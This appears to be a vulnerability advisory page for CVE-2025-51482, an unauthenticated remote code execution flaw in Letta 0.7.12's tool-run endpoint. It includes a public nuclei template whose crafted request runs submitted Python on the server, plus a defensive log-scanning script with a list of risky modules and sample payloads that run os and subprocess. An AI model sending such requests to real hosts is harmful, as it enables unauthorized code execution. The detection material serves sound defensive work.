CVE-2025-51482: Letta Letta 0.7.12 - Remote Code Execution

Date: 2025-11-07 | Affected software: Letta Letta | PoC: public

Vulnerability description

Letta 0.7.12 is vulnerable to remote code execution via POST /v1/tools/run in letta.server.rest_api.routers.v1.tools.run_tool_from_source, allowing attackers to execute arbitrary Python and OS commands via crafted tool source code.

PoC code [public]

id: CVE-2025-51482

info:
  name: Letta Letta 0.7.12 - Remote Code Execution
  author: RaghavArora14
  severity: high
  description: |
    Letta 0.7.12 is vulnerable to remote code execution via POST /v1/tools/run in letta.server.rest_api.routers.v1.tools.run_tool_from_source, allowing attackers to execute arbitrary Python and OS commands via crafted tool source code.
  reference:
    - https://www.gecko.security/blog/cve-2025-51482
    - https://github.com/letta-ai/letta/pull/2630
    - https://github.com/Kai-One001/Letta-CVE-2025-51482-RCE
    - https://nvd.nist.gov/vuln/detail/CVE-2025-51482
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-51482
    epss-score: 0.0902
    epss-percentile: 0.92279
    cwe-id: CWE-94
    cpe: cpe:2.3:a:letta:letta:0.7.12:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: letta
    product: letta
    fofa-query: title="Letta"
  tags: cve,cve2025,rce,letta,vkev

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /v1/tools/run HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "name": "nuclei",
          "args": {},
          "json_schema": {"type": "object", "properties": {}},
          "source_code": "def nuclei():\n    import hashlib\n    data='{{num}}'.encode('utf-8')\n    return ''+hashlib.md5(data).hexdigest()"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'
          - 'tool_return":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b8a80fc56c8aabc43e4197af5b3e3b2ac29b6e3811700e1b8682cd2c493d26e3022100f2da69e45374943b5ceaa82946b16d859b5e92ef531200832342c332ac33e3dc:922c64590222798bb761d5b6d8e72950
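The template above only confirms exposure; a defender also wants to know whether this endpoint has already been hit. The following detection script is an added example for this page, not code from the advisory, the nuclei template or the Letta project. It assumes a request log with one JSON record per line carrying `method`, `path`, `src` and the raw request `body` (an assumed log shape; the sample records are constructed here). It flags every POST to /v1/tools/run, since on affected versions the endpoint runs submitted source without authentication, and raises the severity when the submitted `source_code` imports host-access modules or uses dynamic execution:

```python
import json
import re

# Modules whose import inside a submitted tool strongly suggests command
# execution or host access. Heuristic and not exhaustive: a submitter can
# evade it, so this is triage signal, not a substitute for patching.
SENSITIVE_MODULES = {"os", "subprocess", "sys", "shutil", "socket",
                     "ctypes", "importlib", "builtins"}
# One module per import line; `import a, b` only yields `a` (kept simple).
IMPORT_RE = re.compile(r"^\s*(?:import|from)\s+([A-Za-z_][\w.]*)", re.MULTILINE)
DYNAMIC_RE = re.compile(r"\b(?:__import__|exec|eval|compile)\s*\(")

VULN_PATH = "/v1/tools/run"  # endpoint named in the advisory


def imported_modules(source: str) -> set:
    """Top-level module names imported anywhere in the tool source."""
    return {name.split(".")[0] for name in IMPORT_RE.findall(source)}


def analyse_line(line: str):
    """Return a finding dict for a POST to /v1/tools/run, else None."""
    rec = json.loads(line)
    if rec.get("method") != "POST" or rec.get("path") != VULN_PATH:
        return None
    try:
        body = json.loads(rec.get("body") or "{}")
    except json.JSONDecodeError:
        body = {}
    if not isinstance(body, dict):
        body = {}
    source = body.get("source_code") or ""
    modules = imported_modules(source)
    risky = modules & SENSITIVE_MODULES
    dynamic = bool(DYNAMIC_RE.search(source))
    # Every hit on this endpoint deserves a look on an unpatched host, because
    # it needs no credentials (PR:N); host-access imports raise the severity.
    severity = "high" if (risky or dynamic) else "medium"
    return {
        "src": rec.get("src"),
        "tool": body.get("name"),
        "modules": sorted(modules),
        "risky": sorted(risky),
        "dynamic_exec": dynamic,
        "severity": severity,
    }


def scan(lines):
    """Run analyse_line over an iterable of log lines and keep the findings."""
    return [f for f in (analyse_line(l) for l in lines) if f is not None]


def _entry(method, path, body_obj=None):
    """Build one constructed log line (JSON) for the sample set below."""
    return json.dumps({
        "method": method,
        "path": path,
        "src": "203.0.113.7",  # RFC 5737 documentation address, constructed
        "body": json.dumps(body_obj) if body_obj is not None else "",
    })


_SCHEMA = {"type": "object", "properties": {}}

# Constructed sample log lines; not captured from any real deployment.
SAMPLE_LOGS = [
    _entry("POST", VULN_PATH, {"name": "probe", "args": {}, "json_schema": _SCHEMA,
                               "source_code": "def probe():\n    import os\n    return os.getcwd()"}),
    _entry("POST", VULN_PATH, {"name": "hasher", "args": {}, "json_schema": _SCHEMA,
                               "source_code": "def hasher():\n    import hashlib\n    return hashlib.md5(b'x').hexdigest()"}),
    _entry("GET", "/v1/tools"),
    _entry("POST", VULN_PATH, {"name": "shell", "args": {}, "json_schema": _SCHEMA,
                               "source_code": "import subprocess\ndef shell():\n    return subprocess.run(['hostname']).returncode"}),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(json.dumps(finding))
```

The second sample record is the shape of the nuclei check itself (a harmless `hashlib` tool) and lands as "medium": the point is that any unauthenticated reach of this endpoint is notable on 0.7.12, whatever the payload. Module matching is a triage aid only; the fix is upgrading past the change in letta PR #2630 and keeping the API off untrusted networks.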